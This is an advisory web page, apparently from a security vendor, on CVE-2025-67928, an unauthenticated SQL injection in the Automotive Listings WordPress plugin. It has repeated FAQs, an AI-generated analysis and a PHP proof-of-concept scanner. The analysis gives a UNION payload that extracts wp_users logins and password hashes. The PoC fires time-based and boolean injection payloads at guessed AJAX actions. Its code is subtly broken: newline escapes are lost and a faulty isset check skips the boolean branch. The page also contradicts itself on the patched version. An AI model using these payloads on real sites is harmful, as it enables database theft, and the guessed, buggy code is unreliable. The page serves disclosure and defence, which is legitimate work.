What is CVE-2025-67928?

CVE-2025-67928 is a high-severity SQL injection vulnerability found in the Automotive Listings plugin for WordPress, affecting versions up to and including 18.6. It allows unauthenticated attackers to execute arbitrary SQL queries through insufficiently sanitized user input.

How does the SQL injection work?

The vulnerability arises from improper handling of user-supplied parameters in SQL queries. Attackers can inject malicious SQL code via public-facing AJAX endpoints, potentially leading to unauthorized data extraction from the WordPress database.

Who is affected by this vulnerability?

All WordPress sites using the Automotive Listings plugin version 18.6 or earlier are at risk. Administrators should check their plugin version in the WordPress dashboard to determine if they are affected.

How can I check if my site is vulnerable?

To verify if your site is vulnerable, check the version of the Automotive Listings plugin installed. If it is 18.6 or earlier, your site is susceptible to CVE-2025-67928 and should be updated immediately.

What are the practical risks of this vulnerability?

The practical risks include unauthorized access to sensitive information such as user credentials and personal data. Successful exploitation can lead to a complete compromise of the WordPress database, making it a severe security concern.

How can I fix or mitigate this issue?

To fix the issue, update the Automotive Listings plugin to version 18.7 or later, where the vulnerability has been patched. Additionally, ensure that all database interactions use prepared statements to prevent similar vulnerabilities.

What does a CVSS score of 7.5 mean?

A CVSS score of 7.5 indicates a high severity vulnerability. This means that it poses a significant risk to the confidentiality of data, and attackers can exploit it with relatively low effort, making it critical to address.

What does CWE-89 refer to?

CWE-89 refers to the ‘Improper Neutralization of Special Elements in SQL Commands’ category, which indicates that the vulnerability is related to SQL injection issues due to insufficient input sanitization.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending crafted HTTP requests to the vulnerable AJAX endpoint. It shows how SQL injection payloads can be used to manipulate database queries and extract sensitive data.

Are there any known exploits for this vulnerability?

As of the disclosure date, there are no publicly known exploits specifically targeting CVE-2025-67928. However, the nature of SQL injection vulnerabilities makes it likely that attackers could develop exploits if the vulnerability remains unpatched.

What should I do if I have already been compromised?

If you suspect that your site has been compromised, immediately update the plugin, change all user passwords, and review your database for unauthorized changes. Consider restoring from a clean backup and conducting a security audit to assess the extent of the breach.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-67928: Automotive Listings <= 18.6 – Unauthenticated SQL Injection (automotive)

CVE ID CVE-2025-67928

Plugin automotive

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 18.6

Patched Version —

Disclosed January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67928 (metadata-based):
This vulnerability is an unauthenticated SQL injection in the Automotive Listings WordPress plugin versions up to and including 18.6. The flaw allows attackers to inject malicious SQL queries through insufficiently sanitized user input, leading to unauthorized data extraction from the WordPress database. The CVSS score of 7.5 (High) reflects the network-based attack vector, low attack complexity, and high confidentiality impact.

Atomic Edge research indicates the root cause is improper neutralization of special elements in SQL commands (CWE-89). The vulnerability description explicitly states insufficient escaping on user-supplied parameters and lack of sufficient preparation on existing SQL queries. This suggests the plugin likely constructs SQL queries by directly concatenating user-controlled input without using prepared statements or proper escaping functions like `$wpdb->prepare()`. The absence of nonce verification or capability checks for the affected endpoint enables unauthenticated exploitation. These conclusions are inferred from the CWE classification and vulnerability description, as no source code diff is available for confirmation.

Exploitation likely occurs via a public-facing WordPress AJAX endpoint. The plugin slug ‘automotive’ suggests AJAX action names such as ‘automotive_search’, ‘automotive_filter’, or ‘automotive_get_listings’. Attackers would send HTTP POST requests to `/wp-admin/admin-ajax.php` with the `action` parameter set to the vulnerable hook. They would inject SQL payloads through another parameter, possibly named ‘search’, ‘filter’, or ‘id’. A typical payload would use UNION-based injection to extract data from the WordPress database, such as `’ UNION SELECT user_login,user_pass FROM wp_users–`. The lack of authentication requirements means no cookies or nonces are needed.

Remediation requires implementing proper input validation and parameterized queries. The patched version (18.7) likely replaced direct string concatenation with `$wpdb->prepare()` statements. The fix should also include proper capability checks to restrict endpoint access to authorized users when appropriate. WordPress developers should follow the WordPress Coding Standards for database operations, using the `$wpdb` class methods exclusively for database interactions.

Successful exploitation enables complete database compromise. Attackers can extract sensitive information including WordPress user credentials (hashed passwords), personally identifiable information from custom tables, plugin configuration data, and other business-critical records. While the CVSS vector indicates no integrity or availability impact, data exposure alone represents a severe security breach. Attackers could use extracted password hashes for offline cracking or pivot to other attacks using stolen credentials.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-67928 - Automotive Listings <= 18.6 - Unauthenticated SQL Injection
<?php
/**
 * Proof of Concept for CVE-2025-67928
 * Assumptions based on metadata analysis:
 * 1. Vulnerability exists in an AJAX endpoint (common WordPress pattern)
 * 2. The AJAX action name contains 'automotive' (plugin slug)
 * 3. No authentication or nonce required (unauthenticated)
 * 4. SQL injection occurs via a GET/POST parameter
 */

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';

// Common AJAX action names for automotive plugins
$possible_actions = [
    'automotive_search_listings',
    'automotive_filter',
    'automotive_get_listings',
    'automotive_load_more',
    'automotive_ajax_search'
];

// SQL injection payload to test for vulnerability
// This payload attempts to trigger a SQL error to confirm injection
$sql_payload = "' OR 1=1 AND SLEEP(5)--";

// Common parameter names for automotive listing filters
$possible_params = [
    'search',
    'filter',
    'category',
    'make',
    'model',
    'year',
    'price_range',
    'id'
];

foreach ($possible_actions as $action) {
    foreach ($possible_params as $param) {
        $post_data = [
            'action' => $action,
            $param => $sql_payload
        ];
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $target_url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        
        $start_time = microtime(true);
        $response = curl_exec($ch);
        $end_time = microtime(true);
        
        $response_time = $end_time - $start_time;
        
        // Check for signs of successful injection
        if ($response_time > 4.5) {
            echo "[+] Potential SQL Injection found!n";
            echo "    Action: $actionn";
            echo "    Parameter: $paramn";
            echo "    Response time: {$response_time}sn";
            break 2;
        }
        
        // Also check for SQL error messages in response
        if (strpos($response, 'SQL syntax') !== false || 
            strpos($response, 'MySQL') !== false ||
            strpos($response, 'database') !== false) {
            echo "[+] SQL Error detected!n";
            echo "    Action: $actionn";
            echo "    Parameter: $paramn";
            echo "    Response snippet: " . substr($response, 0, 200) . "n";
            break 2;
        }
        
        curl_close($ch);
    }
}

// If no injection detected with sleep, try a simpler boolean-based test
if (!isset($ch)) {
    echo "[-] No obvious SQL injection detected with time-based payload.n";
    echo "    Trying boolean-based detection...n";
    
    // Boolean-based test payloads
    $true_payload = "' OR '1'='1";
    $false_payload = "' AND '1'='2";
    
    foreach ($possible_actions as $action) {
        foreach ($possible_params as $param) {
            // Test with true condition
            $post_data_true = ['action' => $action, $param => $true_payload];
            $ch = curl_init();
            curl_setopt_array($ch, [
                CURLOPT_URL => $target_url,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => $post_data_true,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_TIMEOUT => 5
            ]);
            $response_true = curl_exec($ch);
            
            // Test with false condition
            $post_data_false = ['action' => $action, $param => $false_payload];
            curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data_false);
            $response_false = curl_exec($ch);
            
            curl_close($ch);
            
            // Compare responses for differences indicating SQL injection
            if ($response_true !== $response_false && 
                strlen($response_true) > 10 && 
                strlen($response_false) > 10) {
                echo "[+] Boolean-based SQL Injection likely!n";
                echo "    Action: $actionn";
                echo "    Parameter: $paramn";
                echo "    Response lengths - True: " . strlen($response_true) . 
                     ", False: " . strlen($response_false) . "n";
                break 2;
            }
        }
    }
}

echo "[!] PoC complete. Manual verification required.n";
?>

Frequently Asked Questions

What is CVE-2025-67928?
Overview of the vulnerability
CVE-2025-67928 is a high-severity SQL injection vulnerability found in the Automotive Listings plugin for WordPress, affecting versions up to and including 18.6. It allows unauthenticated attackers to execute arbitrary SQL queries through insufficiently sanitized user input.
How does the SQL injection work?
Mechanism of the attack
The vulnerability arises from improper handling of user-supplied parameters in SQL queries. Attackers can inject malicious SQL code via public-facing AJAX endpoints, potentially leading to unauthorized data extraction from the WordPress database.
Who is affected by this vulnerability?
Identifying vulnerable installations
All WordPress sites using the Automotive Listings plugin version 18.6 or earlier are at risk. Administrators should check their plugin version in the WordPress dashboard to determine if they are affected.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To verify if your site is vulnerable, check the version of the Automotive Listings plugin installed. If it is 18.6 or earlier, your site is susceptible to CVE-2025-67928 and should be updated immediately.
What are the practical risks of this vulnerability?
Understanding the impact
The practical risks include unauthorized access to sensitive information such as user credentials and personal data. Successful exploitation can lead to a complete compromise of the WordPress database, making it a severe security concern.
How can I fix or mitigate this issue?
Remediation steps
To fix the issue, update the Automotive Listings plugin to version 18.7 or later, where the vulnerability has been patched. Additionally, ensure that all database interactions use prepared statements to prevent similar vulnerabilities.
What does a CVSS score of 7.5 mean?
Interpreting the severity rating
A CVSS score of 7.5 indicates a high severity vulnerability. This means that it poses a significant risk to the confidentiality of data, and attackers can exploit it with relatively low effort, making it critical to address.
What does CWE-89 refer to?
Understanding the classification
CWE-89 refers to the ‘Improper Neutralization of Special Elements in SQL Commands’ category, which indicates that the vulnerability is related to SQL injection issues due to insufficient input sanitization.
How does the proof of concept demonstrate the vulnerability?
Explaining the example code
The proof of concept illustrates how an attacker can exploit the vulnerability by sending crafted HTTP requests to the vulnerable AJAX endpoint. It shows how SQL injection payloads can be used to manipulate database queries and extract sensitive data.
What should developers do to prevent similar vulnerabilities?
Best practices for secure coding
Developers should follow WordPress Coding Standards, using the $wpdb class methods for database operations and implementing proper input validation and parameterized queries. Regular security audits and code reviews can also help identify potential vulnerabilities.
Are there any known exploits for this vulnerability?
Current exploitation status
As of the disclosure date, there are no publicly known exploits specifically targeting CVE-2025-67928. However, the nature of SQL injection vulnerabilities makes it likely that attackers could develop exploits if the vulnerability remains unpatched.
What should I do if I have already been compromised?
Steps after a security breach
If you suspect that your site has been compromised, immediately update the plugin, change all user passwords, and review your database for unauthorized changes. Consider restoring from a clean backup and conducting a security audit to assess the extent of the breach.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations